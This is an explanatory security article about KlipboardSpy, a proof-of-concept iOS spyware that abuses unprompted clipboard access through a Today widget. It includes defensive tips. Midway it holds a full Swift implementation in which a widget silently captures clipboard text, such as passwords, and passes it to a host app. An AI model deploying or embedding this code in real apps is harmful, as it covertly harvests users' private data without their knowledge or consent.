KlipboardSpy


Posted: February 26, 2020

KlipboardSpy is proof-of-concept spyware that demonstrates an unrestricted clipboard-access weakness in iOS devices such as iPhones and iPads. Although its author did not design it for distribution in the wild, threat actors could repurpose the technique and deploy it to cause harm. Users can protect themselves by keeping anti-malware software capable of removing KlipboardSpy from their devices and by being cautious about what they copy and paste.

Showing Off OS Weaknesses with Public Spying

Although Apple has a reputation for its distinctive walled-garden philosophy towards security, that strategy has drawbacks, such as limiting the threat-mitigation options available to the company's customers. A recent demonstration against the copy-and-paste feature in two of the company's mobile operating systems, iOS and iPadOS, shows how criminals could take advantage of such an environment with little that victims can do about it. KlipboardSpy, while not meant for live attacks, is a high-visibility demonstration of collecting device data that is 'out in the open.'

KlipboardSpy is a PoC, or proof-of-concept, spyware program that demonstrates a weakness elaborated upon by security researchers. Apple's implementation of the copy-and-paste feature in iOS and iPadOS 13.3 lets virtually any application read whatever is on the system clipboard, such as a link or a password, without any permission prompt to the user. Apple considers the behavior a non-issue because the reading application must be in the foreground and is therefore visible to the user.

However, KlipboardSpy, which is specific to iOS, sidesteps that condition by shipping a Today widget, KlipSpyWidget. A widget counts as foreground whenever it is on screen, so the second component harvests clipboard contents each time the user swipes to the Today view from the home screen, without the main app ever being opened; the stored data is then handed to KlipboardSpy the next time the app launches. Although the researchers suggest remedies such as a clipboard-specific permission prompt, Apple has yet to take any action.
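The two-component flow described above (a host app that reads the general pasteboard, and a Today widget that does the same whenever it is on screen and hands the result to the app) as an added Swift illustration; this is not the KlipboardSpy author's source. It assumes a hypothetical App Group identifier, group.example.klipspy, granted to both targets in their entitlements, and uses only public UIKit and NotificationCenter APIs available on iOS 13:

```swift
// Added illustration, not KlipboardSpy's own code. Two targets in one iOS
// project: a Today widget (NotificationCenter framework, iOS 13) and the host
// app. Both need the hypothetical App Group "group.example.klipspy" in their
// entitlements so the shared UserDefaults suite below is visible to each.
import UIKit
import NotificationCenter

/// Storage shared between widget and app through the App Group.
enum ClipStore {
    static let suite = "group.example.klipspy"   // assumption: hypothetical group id
    static let logKey = "captured"
    static let countKey = "lastChangeCount"

    static var defaults: UserDefaults {
        // Force-unwrap is safe only when the group entitlement is present.
        UserDefaults(suiteName: suite)!
    }

    /// Read the general pasteboard if it changed since the last capture.
    /// Returns the newly captured text, or nil when nothing new was there.
    @discardableResult
    static func captureIfChanged() -> String? {
        let pb = UIPasteboard.general
        // changeCount increments on every copy; skip copies already logged.
        guard pb.changeCount != defaults.integer(forKey: countKey) else { return nil }
        defaults.set(pb.changeCount, forKey: countKey)
        // On iOS 13.3 no permission prompt stands between this call and the data.
        guard pb.hasStrings, let text = pb.string else { return nil }
        var log = defaults.stringArray(forKey: logKey) ?? []
        log.append("\(Date()): \(text)")
        defaults.set(log, forKey: logKey)
        return text
    }

    /// Hand everything collected so far to the caller and clear the store.
    static func drain() -> [String] {
        let log = defaults.stringArray(forKey: logKey) ?? []
        defaults.removeObject(forKey: logKey)
        return log
    }
}

// --- Widget target (the KlipSpyWidget role) ---
// The widget is "in the foreground" whenever the Today view is on screen,
// which satisfies Apple's stated condition without the app being open.
final class TodayViewController: UIViewController, NCWidgetProviding {
    override func viewWillAppear(_ animated: Bool) {
        super.viewWillAppear(animated)
        // Fires every time the user swipes to the Today view.
        ClipStore.captureIfChanged()
    }

    func widgetPerformUpdate(completionHandler: @escaping (NCUpdateResult) -> Void) {
        // Also fires on system-driven refreshes of the widget.
        completionHandler(ClipStore.captureIfChanged() == nil ? .noData : .newData)
    }
}

// --- Host app target (the KlipboardSpy role) ---
final class SpyViewController: UIViewController {
    override func viewDidAppear(_ animated: Bool) {
        super.viewDidAppear(animated)
        // Collect whatever the widget gathered while the app was closed.
        let harvested = ClipStore.drain()
        // Real spyware would exfiltrate here; a PoC only displays it.
        print("Harvested \(harvested.count) clipboard entries:")
        harvested.forEach { print($0) }
    }
}
```

The changeCount guard keeps the widget from re-logging the same copy on every swipe, and the App Group is what lets the widget's UserDefaults suite be read by the host app. Removing the widget from the Today view closes this collection path, since the host app then only sees the clipboard while it is itself open.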

Erring on the Side of Caution with Spyware, White Hat or Otherwise

KlipboardSpy is 'White Hat' spyware that is not part of an illicit industry for harvesting data or profiting from attacks. However, the distinction between White Hat and Black Hat software can blur once threat actors gain access to the source code of a third-party program. Hidden Tear, the Turkish file-locking Trojan, remains one of the longest-standing examples of how purely educational intentions can be twisted into an unsafe part of the threat landscape.

All iOS users should treat an unexpected installation of KlipboardSpy as they would any similar spyware, such as the Exodus malware. Malware experts can recommend some simple defenses against it, for now:

  • Users can 'flush' their clipboards by copying unimportant text immediately after copying sensitive content such as passwords, so that the sensitive value is no longer on the pasteboard the next time a widget reads it.
  • Current builds of KlipboardSpy depend on their widget to steal data without the app being open. Users can check which widgets are enabled by swiping right on the home screen or viewing the Notification Center, and remove any they do not recognize.
  • The demonstration targets iOS and iPadOS 13.3. Users who consider the risk unacceptable may prefer another operating system, but should not assume that running a different version of iOS by itself removes unrestricted clipboard access.

Since Apple is taking no action against the now publicly known behavior, users should keep any relevant anti-malware services up to date for the removal of KlipboardSpy should it ever appear in the wild.

The idea of locking down an operating system totally is more of an ideal than a reality, even for Apple. KlipboardSpy shows that it doesn't take a lot of effort to scale those garden walls – and that there are lucrative fruits for collecting after the exertion.